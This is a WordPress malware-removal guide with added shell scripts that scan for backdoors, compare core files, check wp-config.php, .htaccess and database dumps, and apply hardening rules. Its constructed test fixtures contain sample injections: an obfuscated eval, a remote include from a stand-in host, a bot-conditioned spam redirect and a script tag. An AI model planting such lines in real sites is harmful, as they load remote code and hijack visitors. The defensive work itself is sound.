How to Remove Malware from WordPress (Complete 2026 Guide)

Written by Aegis Webs – WordPress security, malware recovery, and performance optimization.

WordPress Malware Removal Overview

WordPress malware is malicious code injected into your website without your permission.

If not handled properly, malware can:

  • Redirect visitors to harmful websites
  • Inject spam links into your content
  • Create hidden access accounts
  • Corrupt your sitemap
  • Generate fake backlinks
  • Increase server load
  • Expose API credentials
  • Get your site blacklisted by Google

This guide explains how to detect, remove, and prevent WordPress malware using practical, real-world steps.

What Is WordPress Malware?

WordPress malware is harmful code inserted into your website files or database.

This malicious code can:

  • Redirect visitors to spam or scam websites
  • Inject hidden spam links into your pages
  • Steal customer data
  • Create hidden admin users
  • Generate unauthorized API tokens
  • Create unknown FTP accounts
  • Add unknown users to your Google Search Console accounts
  • Change or corrupt your XML sitemaps
  • Create backlinks to unknown or harmful websites (visible in Google Search Console)
  • Modify important website files without your knowledge
  • Send spam emails from your server
  • Cause sudden spikes in fake or bot traffic
  • Slow down your website
  • Get your site blacklisted by Google

If any of these signs appear, your website should be treated as compromised.

Signs Your Website Is Infected

Common infection indicators include:

  • Unknown admin users appearing in WordPress
  • Unauthorized FTP accounts in hosting panel
  • Newly created API tokens
  • Unknown users added inside Google Search Console
  • Corrupted or replaced sitemap files
  • Sudden appearance of spam backlinks
  • Pages redirecting to malicious domains
  • Suspicious PHP files anywhere on the server — including /wp-content/uploads/, newly created directories in the root folder, or unexpected folders inside wp-admin (such as a maint folder)
  • Repeated automated hits targeting login or admin URLs
  • PHP backdoor files reappearing after deletion

If even one of these symptoms is present, immediate action is required.

What To Do Immediately (Before Cleaning)

Do not panic. Before making any changes, determine what access you still have to wp-admin, hosting panel, files, and database.

Step 1: Check Your Access

Confirm whether you can:

  • Log in to wp-admin
  • Access your hosting control panel (cPanel, Plesk, DirectAdmin, etc.)
  • Use File Manager
  • Access FTP
  • Open phpMyAdmin

Your cleanup method depends on what access remains.

If wp-admin is locked but hosting panel works → cleanup is still possible.
If hosting panel is locked → contact your hosting provider immediately.

Step 2: Take a Full Backup

Before deleting anything, create a full backup.

If wp-admin works:

Install a backup plugin such as:

Create:

  • Full website files backup
  • Full database backup

Download the backup to your local system.

If wp-admin does NOT work:

From hosting panel:

  • Download entire root directory (public_html)
  • Export full database using phpMyAdmin
  • Download .htaccess
  • Download wp-config.php

Check Server-Level Backups

Many hosts provide:

  • JetBackup
  • Backuply (server-side version)
  • Automatic restore points

If a clean restore point exists from before infection, restoration may be faster than manual cleanup.

Do not skip backup creation.

Step 1 – Scan Your Website for Malware

Use Hosting-Level Scanner First

Server-level scanners check every file in the hosting account, not just the WordPress directory, so they catch infections outside WordPress itself.

Common tools include:

  • ImunifyAV / Imunify360
  • ClamAV
  • Linux Malware Detect (Maldet)
  • ConfigServer eXploit Scanner (CXS)

Steps:

  • Open hosting control panel
  • Navigate to Security / Malware Scanner
  • Run full account scan
  • Note flagged file paths

Do not delete immediately.

Document everything first.

Scan Using WordPress Plugin (If wp-admin Works)

Use one scanner at a time.

Options:

Important about MalCare:

  • Free version detects infection
  • It does not remove malware
  • It may not display detailed file paths

Treat it as detection only unless you are using the premium version.

Manual File Inspection

Check:

  • /wp-content/uploads/ (should not contain executable PHP files)
  • Root directory for unknown folders
  • wp-admin for unexpected directories (e.g., maint)
  • Recently modified files
  • .htaccess
  • wp-config.php

Look for:

  • eval()
  • base64_decode()
  • gzinflate()
  • Obfuscated code
  • Long encoded strings
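The checks in the two lists above can be run mechanically before anything is touched. The following shell script is an added example and is not part of the original guide; it assumes a standard WordPress layout under the root directory you pass as the first argument and builds a small constructed sample tree (not a real site) so it can be tried offline. It only reports; it never deletes or modifies files.

```sh
#!/bin/sh
# Added example (not part of the original guide): triage scan of a WordPress tree.
# Assumed: $1 is the site root (e.g. public_html). Findings are printed as
# "<category><TAB><path>"; nothing is deleted or modified.

# Prefix each line of stdin with a category label
tag() { while read -r p; do printf '%s\t%s\n' "$1" "$p"; done; }

# Constructed sample tree for demonstration (not a real site).
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads/2024/01" "$root/wp-includes" "$root/wp-content/plugins/seo-helper"
    printf '<?php echo "clean";\n' > "$root/index.php"
    printf '<?php // genuinely clean helper\n' > "$root/wp-includes/functions.php"
    # A PHP file inside uploads should never exist; this constructed one also
    # uses eval() on a harmless base64 string ("echo 1;")
    printf '<?php eval(base64_decode("ZWNobyAxOw=="));\n' > "$root/wp-content/uploads/2024/01/image.php"
    # Classic obfuscated-loader pattern inside a fake plugin folder (non-functional sample)
    printf '<?php $a="Zm9v"; eval(gzinflate(base64_decode($a)));\n' > "$root/wp-content/plugins/seo-helper/seo.php"
    echo "$root"
}

# 1. PHP files under uploads (that folder should hold media only)
find_php_in_uploads() {
    find "$1/wp-content/uploads" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) 2>/dev/null
}

# 2. PHP files that call the usual loader / obfuscation functions
find_dangerous_calls() {
    grep -rlE 'eval\(|base64_decode\(|gzinflate\(|str_rot13\(' --include='*.php' "$1" 2>/dev/null || true
}

# 3. Files changed within the last N days (default 7); compare with your last known change
find_recently_modified() {
    find "$1" -type f -mtime "-${2:-7}" 2>/dev/null
}

# Full report with category prefixes; keep it before deleting anything
scan_wp_tree() {
    find_php_in_uploads "$1"         | tag php-in-uploads
    find_dangerous_calls "$1"        | tag dangerous-call
    find_recently_modified "$1" "$2" | tag recently-modified
}

# Demo on the constructed tree; on a real site call e.g. scan_wp_tree /home/user/public_html 3
if [ "${1:-}" = "--demo" ]; then scan_wp_tree "$(make_sample_tree)"; fi
```

Run it as `sh scan.sh --demo` to see the report on the sample tree, or source it and call `scan_wp_tree` with your real root. Hits from `find_dangerous_calls` are leads, not verdicts: some legitimate plugins use base64_decode(), so open each flagged file and compare it with the vendor's copy before deleting.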

Step 2 – Remove Malicious Files Safely

Remove Backdoor Files

  • Delete unknown PHP files
  • Delete random alphanumeric filenames
  • Delete fake plugin folders
  • Delete suspicious new directories

If unsure, compare with clean WordPress install.

Replace WordPress Core Files

Download fresh WordPress from wordpress.org.

Extract locally.

Upload and replace:

  • /wp-admin/
  • /wp-includes/
  • Root core files

Do NOT overwrite:

  • /wp-content/
  • wp-config.php
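"Compare with clean WordPress install" can be done file by file before you overwrite anything, so you learn which core files were tampered with and which extra files (for example an unexpected wp-admin/maint/ directory) the attacker added. The script below is an added example, not code from the original guide; it assumes the fresh download is the same WordPress version as the live site (otherwise every file differs), that the first argument is the extracted clean directory and the second the live root, and it skips wp-content/ and wp-config.php exactly as the list above says. It is read-only.

```sh
#!/bin/sh
# Added example (not part of the original guide): compare the live site's core
# files with a fresh extract of the SAME WordPress version. Assumed: $1 is the
# fresh extract directory, $2 is the live root. Only wp-admin/, wp-includes/ and
# the root-level *.php files are compared; wp-content/ and wp-config.php are
# site-specific and deliberately skipped. Output: "modified", "extra" (only in
# the live tree) or "missing" (only in the clean extract) per path. Read-only.

# Relative paths of the core files in a tree (paths containing newlines unsupported)
list_core() {
    (cd "$1" && {
        find wp-admin wp-includes -type f 2>/dev/null
        find . -maxdepth 1 -type f -name '*.php' | sed 's|^\./||'
    }) | sort -u
}

compare_core() {
    clean=$1; live=$2
    list_core "$clean" | while read -r rel; do
        if [ ! -f "$live/$rel" ]; then
            printf 'missing %s\n' "$rel"
        elif ! cmp -s "$clean/$rel" "$live/$rel"; then
            printf 'modified %s\n' "$rel"
        fi
    done
    list_core "$live" | while read -r rel; do
        case "$rel" in wp-config.php) continue ;; esac   # site-specific, never in the clean zip
        [ -f "$clean/$rel" ] || printf 'extra %s\n' "$rel"
    done
}

# Constructed clean/live pair for demonstration (not a real site)
make_sample_pair() {
    base=$(mktemp -d)
    for d in clean live; do
        mkdir -p "$base/$d/wp-admin" "$base/$d/wp-includes" "$base/$d/wp-content/uploads"
        printf '<?php // core admin file\n' > "$base/$d/wp-admin/admin.php"
        printf '<?php // loader\n' > "$base/$d/index.php"
        printf '<?php // includes\n' > "$base/$d/wp-includes/load.php"
    done
    # Constructed tampering in the live copy only
    printf '<?php // core admin file\n@include "x.php";\n' > "$base/live/wp-admin/admin.php"
    mkdir -p "$base/live/wp-admin/maint"
    printf '<?php echo 1;\n' > "$base/live/wp-admin/maint/ok.php"
    # Legitimately present only on the live site and ignored by the comparison
    printf "<?php define('DB_PASSWORD', 'placeholder');\n" > "$base/live/wp-config.php"
    printf 'hello\n' > "$base/live/wp-content/uploads/note.txt"
    echo "$base"
}

# Demo: prints "modified wp-admin/admin.php" and "extra wp-admin/maint/ok.php"
if [ "${1:-}" = "--demo" ]; then b=$(make_sample_pair); compare_core "$b/clean" "$b/live"; fi
```

Every "modified" or "extra" path is something to inspect before the core replacement wipes the evidence; "missing" files are restored by the replacement itself. If WP-CLI is available on the server, `wp core verify-checksums` performs the same comparison against the official checksums for your installed version.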

Inspect wp-config.php Carefully

Open wp-config.php.

Scroll to the bottom.

/* That's all, stop editing! Happy publishing. */
require_once ABSPATH . 'wp-settings.php';

Be suspicious if you see:

  • Code after the require_once line
  • eval()
  • base64_decode()
  • Unknown include statements
  • External domain calls

Compare with wp-config-sample.php from a clean WordPress download.

Remove only malicious code.

Do not remove database credentials or authentication keys.

Inspect .htaccess Carefully

# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress

Red flags:

  • Encoded strings
  • Redirects to unknown domains
  • Conditional bot redirects

If unsure:

  • Backup file
  • Replace with default block
  • Save permalinks in dashboard
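The wp-config.php and .htaccess red flags listed in the two sections above can be checked mechanically as well. The script below is an added example and is not part of the original guide; it assumes the file to inspect is passed as the first argument, and `check_htaccess` takes your own domain as an optional second argument so that redirects to your own site are not reported. The constructed sample files contain the markers the guide describes (code after the require_once line, a remote include, an obfuscated eval() of a harmless string, and a user-agent-conditioned redirect to another host) purely so the checks have something to find. It is read-only.

```sh
#!/bin/sh
# Added example (not part of the original guide): mechanical checks for the
# wp-config.php and .htaccess red flags. Assumed: $1 is the file to inspect;
# check_htaccess takes your own domain as optional $2. Each finding is printed
# as "<category><TAB><line-no>:<text>". Read-only: review the hits yourself.

tag() { while read -r l; do printf '%s\t%s\n' "$1" "$l"; done; }

check_wp_config() {
    f=$1
    # Anything after the require_once wp-settings.php line is not supposed to be there
    awk '/require_once.*wp-settings\.php/ { tail = 1; next }
         tail && NF { print NR ":" $0 }' "$f" | tag code-after-require
    # Loader / obfuscation functions anywhere in the file
    grep -nE 'eval\(|base64_decode\(|gzinflate\(|str_rot13\(' "$f" | tag dangerous-call
    # include/require of a remote URL
    grep -nE '(include|require)(_once)?[^;]*https?://' "$f" | tag remote-include
}

check_htaccess() {
    f=$1; own=${2:-__no_own_domain__}
    # Rewrite/Redirect to an absolute URL on another host
    grep -nE '^[[:space:]]*(RewriteRule|Redirect(Match|Permanent)?)[^#]*https?://' "$f" \
        | grep -v "$own" | tag external-redirect
    # Rewrites conditioned on user agent or referer (how cloaked bot redirects are built)
    grep -nE '^[[:space:]]*RewriteCond[[:space:]]+%[{]HTTP_(USER_AGENT|REFERER)[}]' "$f" | tag conditional-rewrite
    # Long base64-looking tokens
    grep -nE '[A-Za-z0-9+/=]{60,}' "$f" | tag long-encoded-string
}

# Constructed sample files (not from a real site); the eval() string decodes to "echo 1;"
make_config_samples() {
    d=$(mktemp -d)
    cat > "$d/wp-config.php" <<'EOF'
<?php
define('DB_NAME', 'wp');
define('DB_PASSWORD', 'placeholder');

/* That's all, stop editing! Happy publishing. */
require_once ABSPATH . 'wp-settings.php';
require_once 'http://example.invalid/loader.txt';
eval(base64_decode('ZWNobyAxOw=='));
EOF
    cat > "$d/.htaccess" <<'EOF'
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]
RewriteRule ^(.*)$ http://spam.example.invalid/ [R=301,L]
EOF
    echo "$d"
}

# Demo on the constructed files; on a real site pass the live paths and your domain
if [ "${1:-}" = "--demo" ]; then
    d=$(make_config_samples)
    check_wp_config "$d/wp-config.php"
    check_htaccess "$d/.htaccess" mysite.invalid
fi
```

On the sample wp-config.php the report lists two lines after the require_once, one dangerous call and one remote include; on the sample .htaccess it lists the external redirect and the user-agent condition, while the standard WordPress block produces no hits. A hit on `conditional-rewrite` is not automatically malicious (bad-bot blocking rules use the same directive), so read the rule that follows it.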

Step 3 – Clean Malware from Database

Check wp_users

Remove unknown admin users.

Inspect wp_options

Check for:

  • Suspicious URLs
  • Injected scripts
  • Modified homepage URLs
  • Malicious cron entries

Search Entire Database

Search for:

<script>
iframe
base64
eval(

Suspicious domains

Remove injected content carefully.
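The database search above can be run offline against the SQL dump you exported from phpMyAdmin in the backup step, which also tells you which table each hit lives in. The script below is an added example and not part of the original guide; it assumes phpMyAdmin's default export format (an `INSERT INTO \`table\`` line followed by one or more lines of VALUES rows), takes the dump file as the first argument and your own domain as the second, and uses a constructed sample dump so it runs without a server. Hits are leads to inspect, not verdicts: legitimate posts embed iframes and scripts too.

```sh
#!/bin/sh
# Added example (not part of the original guide): search an exported SQL dump
# for the indicators above and report them per table. Assumed: phpMyAdmin's
# default format ("INSERT INTO `table` ... VALUES" followed by row lines);
# $1 is the dump file, $2 your own domain. Read-only.

# "<table><TAB><indicator><TAB><count>" for every table containing an indicator
scan_sql_dump() {
    awk '
        /^INSERT INTO/ { tbl = $3; gsub(/`/, "", tbl) }
        /^(CREATE|DROP|ALTER) TABLE/ { tbl = "" }
        tbl != "" {
            line = tolower($0)
            if (index(line, "<script")) hit[tbl "\tscript-tag"]++
            if (index(line, "<iframe")) hit[tbl "\tiframe"]++
            if (index(line, "base64"))  hit[tbl "\tbase64"]++
            if (index(line, "eval("))   hit[tbl "\teval"]++
        }
        END { for (k in hit) print k "\t" hit[k] }' "$1" | sort
}

# Every host referenced by an absolute URL in the dump, except your own, with counts
list_foreign_hosts() {
    own=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    tr 'A-Z' 'a-z' < "$1" | grep -oE 'https?://[a-z0-9.-]+' | sed 's|^https*://||' \
        | grep -v "^$own\$" | sort | uniq -c | sort -rn
}

# Constructed phpMyAdmin-style dump (sample data, not a real site)
make_sample_dump() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
-- constructed sample dump
CREATE TABLE `wp_options` (`option_id` bigint, `option_name` varchar(191), `option_value` longtext);
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`) VALUES
(1, 'siteurl', 'https://mysite.invalid'),
(2, 'home', 'https://mysite.invalid');
CREATE TABLE `wp_posts` (`ID` bigint, `post_content` longtext);
INSERT INTO `wp_posts` (`ID`, `post_content`) VALUES
(10, '<p>Hello world</p>'),
(11, '<p>Great deal</p><script src="https://cdn.spam.invalid/s.js"></script>'),
(12, '<iframe src="https://cdn.spam.invalid/f" style="display:none"></iframe>');
EOF
    echo "$f"
}

# Demo: reports wp_posts iframe 1, wp_posts script-tag 1, and "2 cdn.spam.invalid"
if [ "${1:-}" = "--demo" ]; then
    f=$(make_sample_dump)
    scan_sql_dump "$f"
    list_foreign_hosts "$f" mysite.invalid
fi
```

The foreign-host list is usually the fastest way to spot an injection: a domain you have never linked to, referenced dozens of times across wp_posts or wp_options, is the thing to search for next. Once you know the table, open it in phpMyAdmin and remove only the injected fragment, leaving the rest of the row intact.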

Verify and Restore XML Sitemaps

Delete corrupted sitemap files from root.

Regenerate sitemap using:

Re-submit in Google Search Console.

Remove unauthorized GSC users.

Protect or Disable XML-RPC

Visit:

yourdomain.com/xmlrpc.php

If active and not needed:

Block via .htaccess:

<Files xmlrpc.php>
order deny,allow
deny from all
</Files>

Advanced users may delete the file, but blocking is safer.

Disable File Editing in Dashboard

Open wp-config.php.

Above this line:

/* That's all, stop editing! Happy publishing. */

Insert:

define('DISALLOW_FILE_EDIT', true);

This removes theme and plugin file editors from wp-admin.

Restrict PHP Execution in Uploads

Navigate to:

public_html/wp-content/uploads/

Create or edit .htaccess inside uploads folder.

Add:

<Files *.php>
    deny from all
</Files>

This prevents execution of malicious scripts uploaded to that folder.
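The three controls above (XML-RPC block, DISALLOW_FILE_EDIT, no PHP execution in uploads) are easy to forget on a rebuilt site, so it helps to audit them and apply whichever is missing in one step. The script below is an added example and is not part of the original guide; it assumes wp-config.php, .htaccess and xmlrpc.php sit in the root you pass as the first argument and that uploads live under wp-content/uploads. The `deny from all` form shown above is Apache 2.2 syntax that Apache 2.4 only honours when mod_access_compat is loaded, so the blocks written here carry both forms inside `<IfModule>` guards; `apply_hardening` edits files, so run it on a backed-up tree, and note that these .htaccess rules do nothing on nginx (LiteSpeed honours them).

```sh
#!/bin/sh
# Added example (not part of the original guide): audit and apply the three
# hardening controls on a WordPress root given as $1. Assumed layout:
# wp-config.php, .htaccess and xmlrpc.php in the root, uploads under
# wp-content/uploads. audit_hardening only reads; apply_hardening edits files.
# Both Apache 2.2 (deny from all) and 2.4 (Require all denied) syntax are accepted.

has_deny() { grep -qiE 'deny from all|Require all denied' "$1" 2>/dev/null; }

# Prints "ok <control>" or "MISSING <control>" per control; always exits 0
audit_hardening() {
    root=$1; up=$root/wp-content/uploads
    if grep -qE "DISALLOW_FILE_EDIT['\"]?[[:space:]]*,[[:space:]]*true" "$root/wp-config.php" 2>/dev/null
    then echo "ok disallow-file-edit"; else echo "MISSING disallow-file-edit"; fi
    if grep -qiE '<Files(Match)?[^>]*php' "$up/.htaccess" 2>/dev/null && has_deny "$up/.htaccess"
    then echo "ok uploads-php-blocked"; else echo "MISSING uploads-php-blocked"; fi
    if [ ! -f "$root/xmlrpc.php" ] || { grep -qiE '<Files[^>]*xmlrpc\.php' "$root/.htaccess" 2>/dev/null && has_deny "$root/.htaccess"; }
    then echo "ok xmlrpc-blocked"; else echo "MISSING xmlrpc-blocked"; fi
    return 0
}

# Adds each control only if it is absent, so running it twice changes nothing
apply_hardening() {
    root=$1; up=$root/wp-content/uploads
    # 1. DISALLOW_FILE_EDIT directly above the "That's all, stop editing!" marker
    if ! grep -q DISALLOW_FILE_EDIT "$root/wp-config.php"; then
        awk -v q="'" '/That.s all, stop editing/ { print "define(" q "DISALLOW_FILE_EDIT" q ", true);" } { print }' \
            "$root/wp-config.php" > "$root/wp-config.php.tmp" && mv "$root/wp-config.php.tmp" "$root/wp-config.php"
    fi
    # 2. No PHP execution inside uploads
    mkdir -p "$up"
    if ! has_deny "$up/.htaccess"; then
        cat >> "$up/.htaccess" <<'EOF'
<FilesMatch "\.(php|phtml|php[0-9])$">
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
  <IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
  </IfModule>
</FilesMatch>
EOF
    fi
    # 3. Block xmlrpc.php at the web server
    if ! grep -qi 'xmlrpc\.php' "$root/.htaccess" 2>/dev/null; then
        cat >> "$root/.htaccess" <<'EOF'
<Files xmlrpc.php>
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
  <IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
  </IfModule>
</Files>
EOF
    fi
}

# Constructed sample root with none of the controls in place (not a real site)
make_sample_root() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads"
    printf "<?php\ndefine('DB_NAME', 'wp');\n/* That's all, stop editing! Happy publishing. */\nrequire_once ABSPATH . 'wp-settings.php';\n" > "$root/wp-config.php"
    printf '# BEGIN WordPress\nRewriteEngine On\nRewriteBase /\nRewriteRule ^index\\.php$ - [L]\nRewriteCond %%{REQUEST_FILENAME} !-f\nRewriteCond %%{REQUEST_FILENAME} !-d\nRewriteRule . /index.php [L]\n# END WordPress\n' > "$root/.htaccess"
    printf '<?php // xmlrpc stub\n' > "$root/xmlrpc.php"
    echo "$root"
}

# Demo: three MISSING lines, then three ok lines after applying
if [ "${1:-}" = "--demo" ]; then r=$(make_sample_root); audit_hardening "$r"; apply_hardening "$r"; audit_hardening "$r"; fi
```

After applying, load a page and the dashboard once to confirm nothing else in .htaccess conflicted, and check that `yourdomain.com/xmlrpc.php` now returns 403. The audit is a heuristic (it looks for a `<Files>` block and a deny directive in the same file, not for their exact nesting), so keep it as a reminder, not as proof.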

How to Prevent Future WordPress Malware

  • Keep WordPress updated
  • Keep plugins updated
  • Do not use cracked (nulled) plugins or themes, or copies from unknown "GPL" download sites
  • Limit admin access
  • Enable 2FA
  • Protect or disable XML-RPC
  • Rotate API tokens if compromised
  • Monitor server logs
  • Maintain regular backups

Frequently Asked Questions (FAQ)

1. How do I know if my WordPress site is hacked?

Common signs include:

  • Unknown admin users
  • Suspicious PHP files in /wp-content/uploads/
  • Redirects to spam domains
  • Spam backlinks appearing in Google Search Console
  • Modified .htaccess or wp-config.php
  • Hosting malware alerts

If even one of these appears unexpectedly, treat the site as compromised.

2. Can I remove WordPress malware without a plugin?

Yes.

You can manually:

  • Replace WordPress core files
  • Remove suspicious PHP files
  • Clean database injections
  • Fix .htaccess
  • Inspect wp-config.php

Plugins help with detection, but manual inspection is often required for complete cleanup.

3. Should I restore from backup instead of cleaning manually?

If you have a clean backup from before the infection, restoration is often faster and safer.

However:

  • Ensure the backup is confirmed clean
  • Rotate passwords after restore
  • Check for reinfection sources

Restoring an infected backup will not solve the problem.

4. Why does malware come back after deletion?

Reinfection usually happens because:

  • A hidden backdoor file was missed
  • An infected plugin/theme remains installed
  • Weak passwords were not changed
  • FTP credentials were compromised
  • Server-level vulnerability still exists

All access credentials must be rotated after cleanup.

5. Is deleting suspicious PHP files enough?

No.

You must also:

  • Replace WordPress core files
  • Check database for injected scripts
  • Inspect cron jobs
  • Verify admin accounts
  • Review .htaccess

Malware rarely exists in only one location.

6. Should I disable XML-RPC?

If you do not use mobile apps or remote publishing, disabling or blocking xmlrpc.php reduces attack surface and brute-force attempts.

Blocking via .htaccess is usually sufficient.

7. Does reinstalling WordPress remove malware?

Reinstalling WordPress core files helps, but it does not:

  • Clean infected plugins
  • Clean infected themes
  • Remove database injections
  • Remove backdoor files in uploads

Core replacement is only one step in the process.

8. Can shared hosting increase malware risk?

Shared hosting itself is not insecure, but risk increases when:

  • Other accounts on the server are compromised
  • File permissions are weak
  • Outdated PHP versions are used
  • No server-side scanner is active

Always ensure your hosting provider maintains updated security layers.

9. After cleaning, what should I change immediately?

Immediately rotate:

  • WordPress admin passwords
  • Hosting panel passwords
  • FTP passwords
  • Database passwords
  • API tokens
  • Google Search Console access

Security cleanup is incomplete without credential rotation.

10. How often should I back up my WordPress site?

Minimum:

  • Before plugin/theme updates
  • Before major content changes

Recommended:

  • Daily backups for active sites
  • Weekly backups for low-traffic sites

Backups must be stored off-server.
